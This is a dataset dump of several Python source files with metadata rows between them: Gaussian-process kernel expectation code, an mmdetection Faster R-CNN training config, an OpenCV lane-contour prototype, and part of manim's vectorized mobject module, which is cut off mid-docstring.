# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
from functools import reduce
import tensorflow as tf
from .. import kernels
from .. import mean_functions as mfn
from ..inducing_variables import InducingPoints
from ..probability_distributions import DiagonalGaussian, Gaussian, MarkovGaussian
from . import dispatch
from .expectations import expectation
NoneType = type(None)
@dispatch.expectation.register(Gaussian, kernels.Sum, NoneType, NoneType, NoneType)
def _E(p, kernel, _, __, ___, nghp=None):
r"""
Compute the expectation:
<\Sum_i diag(Ki_{X, X})>_p(X)
- \Sum_i Ki_{.,.} :: Sum kernel
:return: N
"""
exps = [expectation(p, k, nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
@dispatch.expectation.register(Gaussian, kernels.Sum, InducingPoints, NoneType, NoneType)
def _E(p, kernel, inducing_variable, _, __, nghp=None):
r"""
Compute the expectation:
<\Sum_i Ki_{X, Z}>_p(X)
- \Sum_i Ki_{.,.} :: Sum kernel
:return: NxM
"""
exps = [expectation(p, (k, inducing_variable), nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
@dispatch.expectation.register(
Gaussian, (mfn.Linear, mfn.Identity, mfn.Constant), NoneType, kernels.Sum, InducingPoints
)
def _E(p, mean, _, kernel, inducing_variable, nghp=None):
r"""
Compute the expectation:
expectation[n] = <m(x_n)^T (\Sum_i Ki_{x_n, Z})>_p(x_n)
- \Sum_i Ki_{.,.} :: Sum kernel
:return: NxQxM
"""
exps = [expectation(p, mean, (k, inducing_variable), nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
@dispatch.expectation.register(MarkovGaussian, mfn.Identity, NoneType, kernels.Sum, InducingPoints)
def _E(p, mean, _, kernel, inducing_variable, nghp=None):
r"""
Compute the expectation:
expectation[n] = <x_{n+1} (\Sum_i Ki_{x_n, Z})>_p(x_{n:n+1})
- \Sum_i Ki_{.,.} :: Sum kernel
:return: NxDxM
"""
exps = [expectation(p, mean, (k, inducing_variable), nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
@dispatch.expectation.register(
(Gaussian, DiagonalGaussian), kernels.Sum, InducingPoints, kernels.Sum, InducingPoints
)
def _E(p, kern1, feat1, kern2, feat2, nghp=None):
r"""
Compute the expectation:
expectation[n] = <(\Sum_i K1_i_{Z1, x_n}) (\Sum_j K2_j_{x_n, Z2})>_p(x_n)
- \Sum_i K1_i_{.,.}, \Sum_j K2_j_{.,.} :: Sum kernels
:return: NxM1xM2
"""
crossexps = []
if kern1 == kern2 and feat1 == feat2: # avoid duplicate computation by using transposes
for i, k1 in enumerate(kern1.kernels):
crossexps.append(expectation(p, (k1, feat1), (k1, feat1), nghp=nghp))
for k2 in kern1.kernels[:i]:
eKK = expectation(p, (k1, feat1), (k2, feat2), nghp=nghp)
eKK += tf.linalg.adjoint(eKK)
crossexps.append(eKK)
else:
for k1, k2 in itertools.product(kern1.kernels, kern2.kernels):
crossexps.append(expectation(p, (k1, feat1), (k2, feat2), nghp=nghp))
return reduce(tf.add, crossexps)
| 33.472727
| 99
| 0.670831
|
a6f7fd0476e869140aee2eda369ad3116a08d82f
| 5,712
|
py
|
Python
|
configs/fp16/faster_rcnn_r34_fpn_fp16_1x.py
|
moshes7/mmdetection
|
6e3c30d89e80ada4c84cc06bb6b216584e31cb3e
|
[
"Apache-2.0"
] | null | null | null |
configs/fp16/faster_rcnn_r34_fpn_fp16_1x.py
|
moshes7/mmdetection
|
6e3c30d89e80ada4c84cc06bb6b216584e31cb3e
|
[
"Apache-2.0"
] | null | null | null |
configs/fp16/faster_rcnn_r34_fpn_fp16_1x.py
|
moshes7/mmdetection
|
6e3c30d89e80ada4c84cc06bb6b216584e31cb3e
|
[
"Apache-2.0"
] | null | null | null |
# fp16 settings
fp16 = dict(loss_scale=512.)
# model settings
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet34',
backbone=dict(
type='ResNet',
depth=34,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
# in_channels=[256, 512, 1024, 2048],
# out_channels=256,
in_channels=[64, 128, 256, 512],
out_channels=256, # 64 ???
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
# dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='Resize', img_scale=(640, 480), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
# img_scale=(1333, 800),
img_scale=(640, 480),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=20,
# workers_per_gpu=1,
workers_per_gpu=6,
# imgs_per_gpu=2,
# workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
# step=[8, 11])
# step=[28, 31])
step=[5, 7])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
# total_epochs = 12
# total_epochs = 24 + 8
total_epochs =8
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_r34_fpn_fp16_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
| 30.222222
| 78
| 0.590861
|
8378b3ccaf0072021284bc1682f6e595ba7ebd05
| 5,964
|
py
|
Python
|
prototypes/src/contour.py
|
alexandru-dinu/ir-project
|
70f3bed0b89770729a977fa4c8111ba806932bde
|
[
"MIT"
] | null | null | null |
prototypes/src/contour.py
|
alexandru-dinu/ir-project
|
70f3bed0b89770729a977fa4c8111ba806932bde
|
[
"MIT"
] | 1
|
2019-04-15T12:10:51.000Z
|
2019-05-30T14:35:17.000Z
|
prototypes/src/contour.py
|
alexandru-dinu/ir-project
|
70f3bed0b89770729a977fa4c8111ba806932bde
|
[
"MIT"
] | null | null | null |
import argparse
import warnings
from scipy.interpolate import splev, splprep
from utils import *
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument("--file", type=str)
parser.add_argument("--interp", type=int, default=20)
parser.add_argument("--save", action="store_true")
args = parser.parse_args()
def save_or_show(img, suffix=""):
if args.save:
name = args.file.split("/")[-1].split(".")[0]
save_img(img, name=f"../out/out-{name}{suffix}.png", from_bgr=True)
else:
show(img, from_bgr=True)
def smooth_contour(cnt, num=25):
x, y = cnt.T
x = x.tolist()[0]
y = y.tolist()[0]
# find the B-spline representation of the contour
tck, u = splprep([x, y], u=None, s=1.0, per=1)
u_new = np.linspace(u.min(), u.max(), num)
# evaluate spline given points and knots
x_new, y_new = splev(u_new, tck, der=0)
s_cnt = np.array(list(zip(x_new, y_new))).astype(np.int)
return s_cnt
def separate_contours(contours):
assert len(contours) >= 2
contours = sorted(contours, key=lambda x: len(x), reverse=True)
contours = contours[:2]
w0s = np.median([e[0][0] for e in contours[0]])
w1s = np.median([e[0][0] for e in contours[1]])
idx_left = 0 if w0s < w1s else 1
idx_right = 1 - idx_left
cnt_l = np.transpose(contours[idx_left], (0, 2, 1)).squeeze() # size = N x 2
cnt_r = np.transpose(contours[idx_right], (0, 2, 1)).squeeze() # size = N x 2
# cnt_l = smooth_contour(contours[idx_left], num=args.interp)
# cnt_r = smooth_contour(contours[idx_right], num=args.interp)
return cnt_l, cnt_r
def get_middle_line(img):
assert img[img == 1].size + img[img == 0].size == img.size
# show(img)
h, w = img.shape
out_l = np.zeros((h, w), dtype=np.uint8)
out_r = np.zeros((h, w), dtype=np.uint8)
out = np.zeros((h, w), dtype=np.uint8)
_, contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
# print(f"Found {len(contours)} contours")
cnt_l, cnt_r = separate_contours(contours)
cv2.drawContours(out_l, [cnt_l], 0, 1, thickness=1)
cv2.drawContours(out_r, [cnt_r], 0, 1, thickness=1)
for i in range(h):
ll = np.argwhere(out_l[i, :] == 1)
rr = np.argwhere(out_r[i, :] == 1)
# FIXME
# if ll.size == 0 and rr.size > 0:
# out[i, rr[0] // 2] = 1
# if ll.size > 0 and rr.size == 0:
# out[i, ll[-1] * 2] = 1
# --
if ll.size > 0 and rr.size > 0:
pl, pr = ll[-1], rr[0]
m = abs(pr - pl) // 2
out[i, pl + m] = 1
out = morph_close(out, num_iter=1)
# show(out + img)
return out
def on_video():
capture = cv2.VideoCapture(args.file)
assert capture.isOpened()
fps = capture.get(cv2.CAP_PROP_FPS)
__plot = None
count = 0
while capture.isOpened():
ret, img = capture.read()
count += 1
if count == 180:
return
# if ret and count % 2 != 1:
# continue
sf = 4
h, w, c = img.shape
img = cv2.resize(img, (int(h / sf), int(w / sf)))
# hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(
img, lowerb=np.array([150, 150, 150]), upperb=np.array([255, 255, 255])
)
# show(mask)
mask = cv2.GaussianBlur(mask, ksize=(5, 5), sigmaX=2)
edges = cv2.Canny(mask, threshold1=10, threshold2=30)
edges = morph_close(edges, num_iter=1)
edges = np.divide(edges, 255).astype(np.uint8)
# show(edges)
mid_line = get_middle_line(edges)
ps = np.argwhere(mid_line == 1)
for (x, y) in ps:
cv2.circle(img, (y, x), 1, (0, 255, 0), thickness=-1)
cv2.imshow("out", img)
cv2.waitKey(1)
continue
# play
b = img[:, :, 0]
g = img[:, :, 1]
r = img[:, :, 2]
img = np.dstack((r, g, b))
if __plot is None:
__plot = plt.imshow(img)
else:
__plot.set_data(img)
plt.pause(1 / fps)
plt.draw()
def with_hough(img, edges):
lines = cv2.HoughLines(edges, rho=1, theta=np.pi / 180.0, threshold=70)
thr = 30.0
for i, line in enumerate(lines):
rho, theta = line[0]
if (thr / 180) * np.pi < theta < ((180.0 - thr) / 180) * np.pi:
print(f"[{i}]SKIP theta: {theta * 180.0 / np.pi}")
continue
print(f"[{i}]OK theta: {theta * 180.0 / np.pi}")
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * (a))
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * (a))
cv2.line(img, (x1, y1), (x2, y2), (0, 255, 0), 2)
save_or_show(img, suffix="-hough")
def on_image(img=None):
img = open_img(args.file, gray=False)
h, w, c = img.shape
sf = 6.3 # scale factor: scale original image to 640x480
img = cv2.resize(img, (int(h / sf), int(w / sf)))
# hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(
img, lowerb=np.array([150, 150, 150]), upperb=np.array([255, 255, 255])
)
# show(mask)
mask = cv2.GaussianBlur(mask, ksize=(5, 5), sigmaX=2)
edges = cv2.Canny(mask, threshold1=80, threshold2=120)
edges = morph_close(edges, num_iter=1)
# show(edges); return
if True:
with_hough(img, edges)
return
edges = np.divide(edges, 255).astype(np.uint8)
# show(edges)
mid_line = get_middle_line(edges)
ps = np.argwhere(mid_line == 1)
for (x, y) in ps:
cv2.circle(img, (y, x), 1, (0, 255, 0), thickness=-1)
# show(img, from_bgr=True)
save_or_show(img)
def main():
if "jpg" in args.file:
on_image()
elif "mp4" in args.file:
on_video()
if __name__ == "__main__":
main()
| 25.706897
| 84
| 0.55332
|
1263b71e4c6e9d66cb7718d4a83edf2c14d02232
| 67,738
|
py
|
Python
|
manim/mobject/types/vectorized_mobject.py
|
janLuke/manim
|
18bab2075f7c9987cbba7b173c3b02971b78a560
|
[
"MIT"
] | 1
|
2021-07-03T14:18:38.000Z
|
2021-07-03T14:18:38.000Z
|
manim/mobject/types/vectorized_mobject.py
|
janLuke/manim
|
18bab2075f7c9987cbba7b173c3b02971b78a560
|
[
"MIT"
] | 3
|
2020-07-14T02:46:11.000Z
|
2020-09-09T15:15:55.000Z
|
manim/mobject/types/vectorized_mobject.py
|
janLuke/manim
|
18bab2075f7c9987cbba7b173c3b02971b78a560
|
[
"MIT"
] | null | null | null |
"""Mobjects that use vector graphics."""
__all__ = [
"VMobject",
"VGroup",
"VDict",
"VectorizedPoint",
"CurvesAsSubmobjects",
"DashedVMobject",
]
import itertools as it
import sys
import typing
from abc import ABCMeta
from typing import Optional, Sequence, Union
import colour
import numpy as np
from PIL.Image import Image
from ... import config
from ...constants import *
from ...mobject.mobject import Mobject
from ...mobject.three_d_utils import get_3d_vmob_gradient_start_and_end_points
from ...utils.bezier import (
bezier,
get_smooth_handle_points,
integer_interpolate,
interpolate,
partial_bezier_points,
)
from ...utils.color import BLACK, WHITE, color_to_rgba
from ...utils.iterables import make_even, stretch_array_to_length, tuplify
from ...utils.simple_functions import clip_in_place
from ...utils.space_ops import rotate_vector, shoelace_direction
from .opengl_vectorized_mobject import OpenGLVMobject
# TODO
# - Change cubic curve groups to have 4 points instead of 3
# - Change sub_path idea accordingly
# - No more mark_paths_closed, instead have the camera test
# if last point in close to first point
# - Think about length of self.points. Always 0 or 1 mod 4?
# That's kind of weird.
class MetaVMobject(ABCMeta):
"""Metaclass for initializing corresponding classes as either inheriting from
VMobject or OpenGLVMobject, depending on the value of ``config.renderer`` at
initialization time.
Note that with this implementation, changing the value of ``config.renderer``
after Manim has been imported won't have the desired effect and will lead to
spurious errors.
"""
def __new__(cls, name, bases, namespace):
if len(bases) == 0:
if config.renderer == "opengl":
bases = (OpenGLVMobject,)
else:
bases = (VMobject,)
return super().__new__(cls, name, bases, namespace)
class VMobject(Mobject):
def __init__(
self,
fill_color=None,
fill_opacity=0.0,
stroke_color=None,
stroke_opacity=1.0,
stroke_width=DEFAULT_STROKE_WIDTH,
# The purpose of background stroke is to have
# something that won't overlap the fill, e.g.
# For text against some textured background
background_stroke_color=BLACK,
background_stroke_opacity=1.0,
background_stroke_width=0,
# When a color c is set, there will be a second color
# computed based on interpolating c to WHITE by with
# sheen_factor, and the display will gradient to this
# secondary color in the direction of sheen_direction.
sheen_factor=0.0,
sheen_direction=UL,
# Indicates that it will not be displayed, but
# that it should count in parent mobject's path
close_new_points=False,
pre_function_handle_to_anchor_scale_factor=0.01,
make_smooth_after_applying_functions=False,
background_image=None,
shade_in_3d=False,
# This is within a pixel
# TODO, do we care about accounting for
# varying zoom levels?
tolerance_for_point_equality=1e-6,
n_points_per_cubic_curve=4,
**kwargs,
):
self.fill_color = fill_color
self.fill_opacity = fill_opacity
self.stroke_color = stroke_color
self.stroke_opacity = stroke_opacity
self.stroke_width = stroke_width
self.background_stroke_color = background_stroke_color
self.background_stroke_opacity = background_stroke_opacity
self.background_stroke_width = background_stroke_width
self.sheen_factor = sheen_factor
self.sheen_direction = sheen_direction
self.close_new_points = close_new_points
self.pre_function_handle_to_anchor_scale_factor = (
pre_function_handle_to_anchor_scale_factor
)
self.make_smooth_after_applying_functions = make_smooth_after_applying_functions
self.background_image = background_image
self.shade_in_3d = shade_in_3d
self.tolerance_for_point_equality = tolerance_for_point_equality
self.n_points_per_cubic_curve = n_points_per_cubic_curve
Mobject.__init__(self, **kwargs)
def get_group_class(self):
return VGroup
# Colors
def init_colors(self, propagate_colors=True):
self.set_fill(
color=self.fill_color or self.color,
opacity=self.fill_opacity,
family=propagate_colors,
)
self.set_stroke(
color=self.stroke_color or self.color,
width=self.stroke_width,
opacity=self.stroke_opacity,
family=propagate_colors,
)
self.set_background_stroke(
color=self.background_stroke_color,
width=self.background_stroke_width,
opacity=self.background_stroke_opacity,
family=propagate_colors,
)
self.set_sheen(
factor=self.sheen_factor,
direction=self.sheen_direction,
family=propagate_colors,
)
if not propagate_colors:
for submobject in self.submobjects:
submobject.init_colors(propagate_colors=False)
return self
def generate_rgbas_array(self, color, opacity):
"""
First arg can be either a color, or a tuple/list of colors.
Likewise, opacity can either be a float, or a tuple of floats.
If self.sheen_factor is not zero, and only
one color was passed in, a second slightly light color
will automatically be added for the gradient
"""
colors = list(tuplify(color))
opacities = list(tuplify(opacity))
rgbas = np.array(
[color_to_rgba(c, o) for c, o in zip(*make_even(colors, opacities))]
)
sheen_factor = self.get_sheen_factor()
if sheen_factor != 0 and len(rgbas) == 1:
light_rgbas = np.array(rgbas)
light_rgbas[:, :3] += sheen_factor
clip_in_place(light_rgbas, 0, 1)
rgbas = np.append(rgbas, light_rgbas, axis=0)
return rgbas
def update_rgbas_array(self, array_name, color=None, opacity=None):
passed_color = color if (color is not None) else BLACK
passed_opacity = opacity if (opacity is not None) else 0
rgbas = self.generate_rgbas_array(passed_color, passed_opacity)
if not hasattr(self, array_name):
setattr(self, array_name, rgbas)
return self
# Match up current rgbas array with the newly calculated
# one. 99% of the time they'll be the same.
curr_rgbas = getattr(self, array_name)
if len(curr_rgbas) < len(rgbas):
curr_rgbas = stretch_array_to_length(curr_rgbas, len(rgbas))
setattr(self, array_name, curr_rgbas)
elif len(rgbas) < len(curr_rgbas):
rgbas = stretch_array_to_length(rgbas, len(curr_rgbas))
# Only update rgb if color was not None, and only
# update alpha channel if opacity was passed in
if color is not None:
curr_rgbas[:, :3] = rgbas[:, :3]
if opacity is not None:
curr_rgbas[:, 3] = rgbas[:, 3]
return self
def set_fill(self, color=None, opacity=None, family=True):
if family:
for submobject in self.submobjects:
submobject.set_fill(color, opacity, family)
self.update_rgbas_array("fill_rgbas", color, opacity)
if opacity is not None:
self.fill_opacity = opacity
return self
def set_stroke(
self, color=None, width=None, opacity=None, background=False, family=True
):
if family:
for submobject in self.submobjects:
submobject.set_stroke(color, width, opacity, background, family)
if background:
array_name = "background_stroke_rgbas"
width_name = "background_stroke_width"
opacity_name = "background_stroke_opacity"
color_name = "background_stroke_color"
else:
array_name = "stroke_rgbas"
width_name = "stroke_width"
opacity_name = "stroke_opacity"
color_name = "stroke_color"
self.update_rgbas_array(array_name, color, opacity)
if width is not None:
setattr(self, width_name, width)
if opacity is not None:
setattr(self, opacity_name, opacity)
if color is not None:
setattr(self, color_name, color)
return self
def set_background_stroke(self, **kwargs):
kwargs["background"] = True
self.set_stroke(**kwargs)
return self
def set_style(
self,
fill_color=None,
fill_opacity=None,
stroke_color=None,
stroke_width=None,
stroke_opacity=None,
background_stroke_color=None,
background_stroke_width=None,
background_stroke_opacity=None,
sheen_factor=None,
sheen_direction=None,
background_image=None,
family=True,
):
self.set_fill(color=fill_color, opacity=fill_opacity, family=family)
self.set_stroke(
color=stroke_color,
width=stroke_width,
opacity=stroke_opacity,
family=family,
)
self.set_background_stroke(
color=background_stroke_color,
width=background_stroke_width,
opacity=background_stroke_opacity,
family=family,
)
if sheen_factor:
self.set_sheen(
factor=sheen_factor, direction=sheen_direction, family=family
)
if background_image:
self.color_using_background_image(background_image)
return self
def get_style(self, simple=False):
ret = {
"stroke_opacity": self.get_stroke_opacity(),
"stroke_width": self.get_stroke_width(),
}
if simple:
ret["fill_color"] = colour.rgb2hex(self.get_fill_color().get_rgb())
ret["fill_opacity"] = self.get_fill_opacity()
ret["stroke_color"] = colour.rgb2hex(self.get_stroke_color().get_rgb())
else:
ret["fill_color"] = self.get_fill_colors()
ret["fill_opacity"] = self.get_fill_opacities()
ret["stroke_color"] = self.get_stroke_colors()
ret["background_stroke_color"] = self.get_stroke_colors(background=True)
ret["background_stroke_width"] = self.get_stroke_width(background=True)
ret["background_stroke_opacity"] = self.get_stroke_opacity(background=True)
ret["sheen_factor"] = self.get_sheen_factor()
ret["sheen_direction"] = self.get_sheen_direction()
ret["background_image"] = self.get_background_image()
return ret
def match_style(self, vmobject, family=True):
self.set_style(**vmobject.get_style(), family=False)
if family:
# Does its best to match up submobject lists, and
# match styles accordingly
submobs1, submobs2 = self.submobjects, vmobject.submobjects
if len(submobs1) == 0:
return self
elif len(submobs2) == 0:
submobs2 = [vmobject]
for sm1, sm2 in zip(*make_even(submobs1, submobs2)):
sm1.match_style(sm2)
return self
def set_color(self, color, family=True):
self.set_fill(color, family=family)
self.set_stroke(color, family=family)
# check if a list of colors is passed to color
if isinstance(color, str):
self.color = colour.Color(color)
else:
self.color = color
return self
def set_opacity(self, opacity, family=True):
self.set_fill(opacity=opacity, family=family)
self.set_stroke(opacity=opacity, family=family)
self.set_stroke(opacity=opacity, family=family, background=True)
return self
def fade(self, darkness=0.5, family=True):
factor = 1.0 - darkness
self.set_fill(opacity=factor * self.get_fill_opacity(), family=False)
self.set_stroke(opacity=factor * self.get_stroke_opacity(), family=False)
self.set_background_stroke(
opacity=factor * self.get_stroke_opacity(background=True), family=False
)
super().fade(darkness, family)
return self
def get_fill_rgbas(self):
try:
return self.fill_rgbas
except AttributeError:
return np.zeros((1, 4))
def get_fill_color(self):
"""
If there are multiple colors (for gradient)
this returns the first one
"""
return self.get_fill_colors()[0]
def get_fill_opacity(self):
"""
If there are multiple opacities, this returns the
first
"""
return self.get_fill_opacities()[0]
def get_fill_colors(self):
return [colour.Color(rgb=rgba[:3]) for rgba in self.get_fill_rgbas()]
def get_fill_opacities(self):
return self.get_fill_rgbas()[:, 3]
def get_stroke_rgbas(self, background=False):
try:
if background:
rgbas = self.background_stroke_rgbas
else:
rgbas = self.stroke_rgbas
return rgbas
except AttributeError:
return np.zeros((1, 4))
def get_stroke_color(self, background=False):
return self.get_stroke_colors(background)[0]
def get_stroke_width(self, background=False):
if background:
width = self.background_stroke_width
else:
width = self.stroke_width
if isinstance(width, str):
width = int(width)
return max(0, width)
def get_stroke_opacity(self, background=False):
return self.get_stroke_opacities(background)[0]
def get_stroke_colors(self, background=False):
return [
colour.Color(rgb=rgba[:3]) for rgba in self.get_stroke_rgbas(background)
]
def get_stroke_opacities(self, background=False):
return self.get_stroke_rgbas(background)[:, 3]
def get_color(self):
if np.all(self.get_fill_opacities() == 0):
return self.get_stroke_color()
return self.get_fill_color()
def set_sheen_direction(self, direction, family=True):
direction = np.array(direction)
if family:
for submob in self.get_family():
submob.sheen_direction = direction
else:
self.sheen_direction = direction
return self
def set_sheen(self, factor, direction=None, family=True):
if family:
for submob in self.submobjects:
submob.set_sheen(factor, direction, family)
self.sheen_factor = factor
if direction is not None:
# family set to false because recursion will
# already be handled above
self.set_sheen_direction(direction, family=False)
# Reset color to put sheen_factor into effect
if factor != 0:
self.set_stroke(self.get_stroke_color(), family=family)
self.set_fill(self.get_fill_color(), family=family)
return self
def get_sheen_direction(self):
return np.array(self.sheen_direction)
def get_sheen_factor(self):
return self.sheen_factor
def get_gradient_start_and_end_points(self):
if self.shade_in_3d:
return get_3d_vmob_gradient_start_and_end_points(self)
else:
direction = self.get_sheen_direction()
c = self.get_center()
bases = np.array(
[self.get_edge_center(vect) - c for vect in [RIGHT, UP, OUT]]
).transpose()
offset = np.dot(bases, direction)
return (c - offset, c + offset)
def color_using_background_image(self, background_image: Union[Image, str]):
self.background_image = background_image
self.set_color(WHITE)
for submob in self.submobjects:
submob.color_using_background_image(background_image)
return self
def get_background_image(self) -> Union[Image, str]:
return self.background_image
def match_background_image(self, vmobject):
self.color_using_background_image(vmobject.get_background_image())
return self
def set_shade_in_3d(self, value=True, z_index_as_group=False):
for submob in self.get_family():
submob.shade_in_3d = value
if z_index_as_group:
submob.z_index_group = self
return self
# Points
def set_points(self, points):
self.points = np.array(points)
return self
def get_points(self):
return np.array(self.points)
def set_anchors_and_handles(
self,
anchors1: Sequence[float],
handles1: Sequence[float],
handles2: Sequence[float],
anchors2: Sequence[float],
) -> "VMobject":
"""Given two sets of anchors and handles, process them to set them as anchors and handles of the VMobject.
anchors1[i], handles1[i], handles2[i] and anchors2[i] define the i-th bezier curve of the vmobject. There are four hardcoded paramaters and this is a problem as it makes the number of points per cubic curve unchangeable from 4. (two anchors and two handles).
Returns
-------
VMobject
for chaining.
"""
assert len(anchors1) == len(handles1) == len(handles2) == len(anchors2)
nppcc = self.n_points_per_cubic_curve # 4
total_len = nppcc * len(anchors1)
self.points = np.zeros((total_len, self.dim))
# the following will, from the four sets, dispatch them in points such that self.points = [anchors1[0], handles1[0], handles2[0], anchors1[0], anchors1[1], handles1[1], ...]
arrays = [anchors1, handles1, handles2, anchors2]
for index, array in enumerate(arrays):
self.points[index::nppcc] = array
return self
def clear_points(self):
self.points = np.zeros((0, self.dim))
def append_points(self, new_points):
# TODO, check that number new points is a multiple of 4?
# or else that if len(self.points) % 4 == 1, then
# len(new_points) % 4 == 3?
self.points = np.append(self.points, new_points, axis=0)
return self
def start_new_path(self, point):
# TODO, make sure that len(self.points) % 4 == 0?
self.append_points([point])
return self
def add_cubic_bezier_curve(
self, anchor1: np.ndarray, handle1: np.ndarray, handle2: np.ndarray, anchor2
) -> None:
# TODO, check the len(self.points) % 4 == 0?
self.append_points([anchor1, handle1, handle2, anchor2])
def add_cubic_bezier_curve_to(
self, handle1: np.ndarray, handle2: np.ndarray, anchor: np.ndarray
) -> None:
"""Add cubic bezier curve to the path.
NOTE : the first anchor is not a paramater as by default the end of the last sub-path!
Parameters
----------
handle1 : np.ndarray
first handle
handle2 : np.ndarray
second handle
anchor : np.ndarray
anchor
"""
self.throw_error_if_no_points()
new_points = [handle1, handle2, anchor]
if self.has_new_path_started():
self.append_points(new_points)
else:
self.append_points([self.get_last_point()] + new_points)
def add_quadratic_bezier_curve_to(
self, handle: np.ndarray, anchor: np.ndarray
) -> "VMobject":
"""Add Quadratic bezier curve to the path."""
# How does one approximate a quadratic with a cubic?
# refer to the Wikipedia page on Bezier curves
# https://en.wikipedia.org/wiki/B%C3%A9zier_curve#Degree_elevation, accessed Jan 20, 2021
# 1. Copy the end points, and then
# 2. Place the 2 middle control points 2/3 along the line segments
# from the end points to the quadratic curve's middle control point.
# I think that's beautiful.
self.add_cubic_bezier_curve_to(
2 / 3 * handle + 1 / 3 * self.get_last_point(),
2 / 3 * handle + 1 / 3 * anchor,
anchor,
)
return self
def add_line_to(self, point: np.ndarray) -> "VMobject":
"""Add a straight line from the last point of VMobject to the given point.
Parameters
----------
point : np.ndarray
end of the straight line.
"""
nppcc = self.n_points_per_cubic_curve
self.add_cubic_bezier_curve_to(
*[
interpolate(self.get_last_point(), point, a)
for a in np.linspace(0, 1, nppcc)[1:]
]
)
return self
def add_smooth_curve_to(self, *points: np.array) -> "VMobject":
"""Creates a smooth curve from given points and add it to the VMobject. If two points are passed in, the first is interpreted
as a handle, the second as an anchor.
Parameters
----------
points: np.array
